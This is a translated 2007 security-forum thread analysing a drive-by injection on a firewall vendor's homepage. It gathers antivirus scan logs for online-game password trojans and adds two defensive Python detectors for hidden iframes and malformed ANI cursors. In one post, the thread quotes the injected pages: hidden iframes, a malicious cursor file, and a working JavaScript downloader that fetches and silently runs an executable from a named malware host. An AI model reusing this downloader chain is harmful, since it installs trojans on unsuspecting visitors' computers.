Views: 7020 | Replies: 25

[Malware sample] Skynet (天网) firewall homepage hit by a drive-by malware injection

wwtd
Posted 2007-10-30 06:45:16
http://pfw.sky.net.cn/
Grabbed a few.

[This post was last edited by wwtd on 2007-10-30 07:03]

无敌敏敏
Posted 2007-10-30 06:47:10
Starting the file scan:

Begin scan in 'E:\104.rar'
E:\104.rar
  [0] Archive type: RAR
  --> 104.htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [INFO]      The file was deleted!
a256886572008
Posted 2007-10-30 07:31:44
<iframe src=http://www.smsunionmm.com/104/ width=100 height=0 frameborder=0></iframe>  

<html><TITLE>index</TITLE><BODY>
<iframe src=http://www.smsunionmm.com/104/111/001.htm width=50 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/222/002.htm width=0 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/333/003.htm width=0 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/xl/ok.asp width=0 height=0></iframe>
</body></html>
<script src='http://s109.cnzz.com/stat.php?id=418430&web_id=418430' language='JavaScript' charset='gb2312'></script>


http://www.smsunionmm.com/104/111/001.htm
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=big5">
<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
<BODY>
<DIV style="CURSOR: url('http://www.smsunionmm.com/104/111/1.jpg')"></DIV>
</BODY></HTML>


http://www.smsunionmm.com/104/111/1.jpg
[Binary animated-cursor file pasted as text; the dump is unreadable, but the recoverable strings are the RIFF / ACON / anih chunk tags, a "cmd /c" command string, and the download URL http://www.smsunionmm.com/104/1.exe]


http://www.smsunionmm.com/104/222/002.htm
<html><head>
<script language =javascript>
function gn(n)
{var number = Math.random()*n;return '~tmp'+Math.round(number)+'.exe';}
try{
dl='http://www.smsunionmm.com/104/1.exe';
var df=document.createElement("object");
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
var S=df.CreateObject("Adodb.Stream","");
S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0);
fname1= F.BuildPath(tmp,fname1);
S.Open(); S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close();
var Q=df.CreateObject("Shell.Application","");
Q.ShellExecute(fname1,"","","open",0); }
catch(i)
{i=1;}
</script></head></html>

[This post was last edited by a256886572008 on 2007-10-30 07:35]

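The chain posted above has three statically visible traits: zero-size iframes, a CSS cursor that points at a remote "image", and script text that builds the RDS.DataSpace control with ADODB.Stream and Shell.Application to fetch and run a file. The following is an added example, not code from the thread or from any of the posters, written from the defender's side: a small Python scanner using only the standard-library HTML parser that reports those indicators. The three sample pages are constructed, cut down from the HTML and script posted above; the CLSID is the one in the posted script.

```python
"""Scan an HTML page for the drive-by indicators seen in the injected chain:
hidden iframes, a CSS cursor loaded from a remote URL (the ANI vector), and
script text that wires up the RDS.DataSpace control with ADODB.Stream /
Shell.Application (the download-and-run pattern)."""
from html.parser import HTMLParser
import re

# CLSID of the RDS.DataSpace control, taken from the script posted in the thread
RDS_DATASPACE_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
CURSOR_URL_RE = re.compile(r"cursor\s*:\s*url\(\s*['\"]?([^'\")]+)", re.I)
PAYLOAD_URL_RE = re.compile(r"https?://[^\s'\"]+\.exe\b", re.I)
SCRIPT_MARKERS = ("adodb.stream", "shell.application",
                  "scripting.filesystemobject", "savetofile", "shellexecute")


def _as_int(value):
    """Parse a width/height attribute; None when it is missing or not a plain number."""
    try:
        return int(value.strip().lower().removesuffix("px"))
    except (ValueError, AttributeError):
        return None


class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # list of (kind, value)
        self._script_chunks = None  # collects text while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            # a zero-width or zero-height frame renders nothing the user can see
            if any(_as_int(a.get(k)) == 0 for k in ("width", "height")):
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "")
            if clsid == RDS_DATASPACE_CLSID:
                self.findings.append(("rds_dataspace_object", a.get("classid", "")))
        elif tag == "script":
            self._script_chunks = []
            if a.get("src"):
                self.findings.append(("external_script", a["src"]))
        m = CURSOR_URL_RE.search(a.get("style", ""))
        if m:
            url = m.group(1).strip()
            # a cursor fetched over HTTP is parsed by the ANI loader; flag it
            if url.lower().startswith(("http://", "https://")):
                self.findings.append(("remote_cursor", url))

    def handle_data(self, data):
        if self._script_chunks is not None:
            self._script_chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_chunks is not None:
            text = "".join(self._script_chunks)
            self._script_chunks = None
            low = text.lower()
            hits = [mk for mk in SCRIPT_MARKERS if mk in low]
            if hits:
                self.findings.append(("script_com_markers", ",".join(hits)))
            if RDS_DATASPACE_CLSID in low:
                self.findings.append(("rds_dataspace_in_script", RDS_DATASPACE_CLSID))
            for url in PAYLOAD_URL_RE.findall(text):
                self.findings.append(("script_payload_url", url))


def scan_html(text):
    """Return the list of (kind, value) indicators found in an HTML page."""
    p = DriveByScanner()
    p.feed(text)
    p.close()
    return p.findings


# Constructed samples, cut down from the injected pages posted in the thread.
SAMPLE_INDEX = """<html><TITLE>index</TITLE><BODY>
<iframe src=http://www.smsunionmm.com/104/111/001.htm width=50 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/222/002.htm width=0 height=0></iframe>
</body></html>"""

SAMPLE_001 = """<BODY><DIV style="CURSOR: url('http://www.smsunionmm.com/104/111/1.jpg')"></DIV></BODY>"""

SAMPLE_002 = """<html><head><script language=javascript>
try{
dl='http://www.smsunionmm.com/104/1.exe';
var df=document.createElement("object");
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var S=df.CreateObject("Adodb.Stream","");
var Q=df.CreateObject("Shell.Application","");
} catch(i){i=1;}
</script></head></html>"""

if __name__ == "__main__":
    for name, page in (("index", SAMPLE_INDEX), ("001.htm", SAMPLE_001), ("002.htm", SAMPLE_002)):
        print(name)
        for kind, value in scan_html(page):
            print("  ", kind, value)
```

The script check is deliberately string-based: the posted sample splits "Microsoft.XMLHTTP" into concatenated fragments, but leaves "Adodb.Stream", "Shell.Application" and the CLSID intact, which is why those are the markers worth keying on.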
无敌敏敏
Posted 2007-10-30 07:39:28
Quoting a256886572008 (posted 2007-10-30 07:31):

http://www.smsunionmm.com/104/111/001.htm
http://www.smsunionmm.com/104/111/1.jpg
http://www.smsunionmm.com/104/222/002.htm

Starting the file scan:
Begin scan in 'E:\1.rar'
E:\1.rar
  [0] Archive type: RAR
  --> 1.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Zhidao
      [INFO]      The file was deleted!
a256886572008
Posted 2007-10-30 07:56:27
Downloaded a whole bunch.

无敌敏敏
Posted 2007-10-30 07:59:15

Reply to #5 (a256886572008's post)

Online-game trojans~

Starting the file scan:

Begin scan in 'E:\down.rar'
E:\down.rar
  [0] Archive type: RAR
  --> dahua.exe
      [DETECTION] Is the Trojan horse TR/PSW.Onlineg.ZX.1
  --> dahua3.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> daojian.exe
      [DETECTION] Is the Trojan horse TR/Agent.19544.4
  --> fengyun.exe
      [DETECTION] Is the Trojan horse TR/Agent.19044
  --> guangzhi.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.fra
  --> huaxia.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> jianghu.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.gfi
  --> jianxia.exe
      [DETECTION] Is the Trojan horse TR/FWDisable.22112.1
  --> menghuan1.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.giv
  --> moyu.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> ms.exe
      [DETECTION] Is the Trojan horse TR/PSW.Wow.acd
  --> potian.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> qiji.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> tianlong.exe
      [DETECTION] Is the Trojan horse TR/Agent.19528
  --> wanmei.exe
      [DETECTION] Contains suspicious code HEUR/Malware
  --> wendao.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.gew
  --> wulin.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.gie
  --> zhengtu.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
  --> zhuxian.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.giz
  --> menghuan.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.giv
  --> internat.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Zhidao
      [INFO]      The file was deleted!

[This post was last edited by 无敌敏敏 on 2007-10-30 08:06]
xqiafl
Posted 2007-10-30 08:08:21
Really ironic: a security site gets hit with a drive-by injection.

Anyway, I've already blocked this site, www.smsunionmm.com/ !!

A 60KB HOSTS file!!
wangjay1980
Posted 2007-10-30 10:22:03
detected: malware Exploit.Win32.IMG-ANI.k      .kafan.cn/attachment.php?aid=146293//1.jpg
detected: Trojan program Trojan-Downloader.Win32.Agent.buv        URL: http://bbs.kafan.cn/attachment.php?aid=146295//1.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.ggc        File: C:\Documents and Settings\Owner\桌面\down.rar/dahua.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fyp        File: C:\Documents and Settings\Owner\桌面\down.rar/daojian.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gjt        File: C:\Documents and Settings\Owner\桌面\down.rar/fengyun.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fra        File: C:\Documents and Settings\Owner\桌面\down.rar/guangzhi.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gfd        File: C:\Documents and Settings\Owner\桌面\down.rar/jianghu.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.giv        File: C:\Documents and Settings\Owner\桌面\down.rar/menghuan1.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gjs        File: C:\Documents and Settings\Owner\桌面\down.rar/ms.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gkc        File: C:\Documents and Settings\Owner\桌面\down.rar/qiji.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fyp        File: C:\Documents and Settings\Owner\桌面\down.rar/tianlong.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gjr        File: C:\Documents and Settings\Owner\桌面\down.rar/wanmei.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fyp        File: C:\Documents and Settings\Owner\桌面\down.rar/wendao.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gih        File: C:\Documents and Settings\Owner\桌面\down.rar/wulin.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.giv        File: C:\Documents and Settings\Owner\桌面\down.rar/zhuxian.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.giv        File: C:\Documents and Settings\Owner\桌面\down.rar/menghuan.exe//UPack
detected: Trojan program Trojan-Downloader.Win32.Agent.buv        File: C:\Documents and Settings\Owner\桌面\down.rar/internat.exe//UPack
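Several scanners in this thread flag 1.jpg as an ANI exploit (Exploit.Win32.IMG-ANI.k here, Win32/TrojanDownloader.Ani.Gen further down), and the dump posted earlier shows the "image" is really a RIFF/ACON animated cursor with a download URL inside it. As an added example, not code from the thread or from any poster, here is a Python walker over the RIFF chunk tree that reports the structural anomalies a benign cursor never has: an anih chunk whose length is not the 36-byte ANIHEADER structure, a repeated anih, a chunk that claims more bytes than the file holds, or a URL / shell command string inside chunk data. The sample files are constructed inside the block (example.invalid is a placeholder host); the 36-byte ANIHEADER size comes from the ANI format itself, not from the thread.

```python
"""Walk the RIFF chunk tree of an animated-cursor (.ani) file and report the
shapes a benign cursor never has: an 'anih' chunk whose length differs from
the 36-byte ANIHEADER structure, a repeated 'anih', a chunk that claims more
bytes than the file holds, or a URL / shell command inside chunk data."""
import re
import struct

ANIHEADER_LEN = 36  # sizeof(ANIHEADER); a well-formed anih chunk is exactly this long
STRING_RE = re.compile(rb"(https?://[\x21-\x7e]+|cmd(?:\.exe)?\s*/c)", re.I)


def iter_chunks(data, start, end):
    """Yield (fourcc, data_offset, declared_size) for each chunk in data[start:end],
    descending into LIST chunks; a truncated trailer simply ends the walk."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        body = pos + 8
        yield fourcc, body, size
        if fourcc == b"LIST" and body + 4 <= end:
            # a LIST carries a 4-byte list type, then nested chunks
            yield from iter_chunks(data, body + 4, min(body + size, end))
        pos = body + size + (size & 1)  # chunk bodies are padded to an even length


def ani_findings(data):
    """Return a list of finding strings; an empty list means the layout looks sane."""
    if data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not_a_riff_acon_file"]
    findings = []
    anih_count = 0
    for fourcc, body, size in iter_chunks(data, 12, len(data)):
        name = fourcc.decode("latin-1")
        if fourcc == b"anih":
            anih_count += 1
            if size != ANIHEADER_LEN:
                findings.append(f"anih_bad_len:{size}")
            if anih_count > 1:
                findings.append("anih_repeated")
        if body + size > len(data):
            findings.append(f"chunk_overruns_file:{name}")
        # printable URLs or "cmd /c" have no business inside cursor chunk data
        for m in STRING_RE.finditer(data[body:body + size]):
            findings.append("embedded_string:" + m.group(0).decode("latin-1"))
    return findings


# --- constructed samples (not files from the thread) -------------------------
def _chunk(fourcc, payload):
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def _ani(*chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# one 36-byte anih (cbSize=36, remaining fields zeroed): the minimal well-formed header
GOOD_ANI = _ani(_chunk(b"anih", struct.pack("<I", ANIHEADER_LEN) + b"\x00" * 32))

# a second, oversized anih carrying a download URL (placeholder host), modelled on
# the shape of the 1.jpg dump posted in the thread
BAD_ANI = _ani(
    _chunk(b"anih", struct.pack("<I", ANIHEADER_LEN) + b"\x00" * 32),
    _chunk(b"anih", b"A" * 60 + b"http://example.invalid/1.exe"),
)

if __name__ == "__main__":
    print("good:", ani_findings(GOOD_ANI))
    print("bad: ", ani_findings(BAD_ANI))
```

Because the walker trusts declared sizes only for positioning and never copies chunk data into a fixed buffer, it can be pointed at untrusted files; the `chunk_overruns_file` finding is what a truncated or length-lying sample produces.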
clock11011
Posted 2007-10-30 11:43:19
kv2008:


yclidong
Posted 2007-10-30 12:46:07
扫描进行于:2007-10-30 12:45:28
扫描日志
NOD32版本 2626 (20071030) NT
命令行: C:\Documents and Settings\Administrator\桌面\1.rar

日期: 30.10.2007  时间:12:45:30
已开启反隐藏功能.
已扫描的磁盘,文件夹及文件:C:\Documents and Settings\Administrator\桌面\1.rar
C:\Documents and Settings\Administrator\桌面\1.rar >>RAR >>1.jpg - Win32/TrojanDownloader.Ani.Gen 木马的变种
已扫描的文件数目:3
已发现的病毒数目:1
完成时间: 12:45:30 总扫描时间:0 秒 (00:00:00)
Copyright © KaFan  KaFan.cn All Rights Reserved.